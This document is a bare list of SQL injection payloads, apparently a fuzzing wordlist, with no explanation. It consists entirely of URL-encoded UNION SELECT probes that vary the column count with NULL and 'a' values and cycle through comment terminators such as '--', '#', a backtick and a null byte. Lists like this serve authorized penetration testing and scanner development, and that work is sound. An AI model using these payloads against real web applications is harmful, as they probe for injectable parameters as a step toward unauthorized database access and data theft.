'+UNION+SELECT+'a'--
'+UNION+SELECT+'a'--+
'+UNION+SELECT+'a'#
'+UNION+SELECT+'a'--+-
'+UNION+SELECT+'a'`
'+UNION+SELECT+'a';%00
'+UNION+SELECT+NULL,'a'--
'+UNION+SELECT+NULL,'a'--+
'+UNION+SELECT+NULL,'a'--+-
'+UNION+SELECT+NULL,'a'#
'+UNION+SELECT+NULL,'a'`
'+UNION+SELECT+NULL,'a';%00
+UNION+SELECT+'a','a'--
'+UNION+SELECT+'a','a'--+
'+UNION+SELECT+'a','a'#
'+UNION+SELECT+'a','a'--+-
'+UNION+SELECT+'a','a'`
'+UNION+SELECT+'a','a';%00
'+UNION+SELECT+NULL,NULL,'a';%00
'+UNION+SELECT+NULL,NULL,'a'--
'+UNION+SELECT+NULL,NULL,'a'--+
'+UNION+SELECT+NULL,NULL,'a'--+-
'+UNION+SELECT+NULL,NULL,'a'#
'+UNION+SELECT+NULL,NULL,'a'`
'+UNION+SELECT+NULL,'a','a';%00
'+UNION+SELECT+NULL,'a','a'--
'+UNION+SELECT+NULL,'a','a'--+-
'+UNION+SELECT+NULL,'a','a'#
'+UNION+SELECT+NULL,'a','a'--+
'+UNION+SELECT+NULL,'a','a'`
'+UNION+SELECT+'a','a','a';%00
'+UNION+SELECT+'a','a','a'--
'+UNION+SELECT+'a','a','a'--+
'+UNION+SELECT+'a','a','a'--+-
'+UNION+SELECT+'a','a','a'`
'+UNION+SELECT+NULL,NULL,NULL,'a';%00
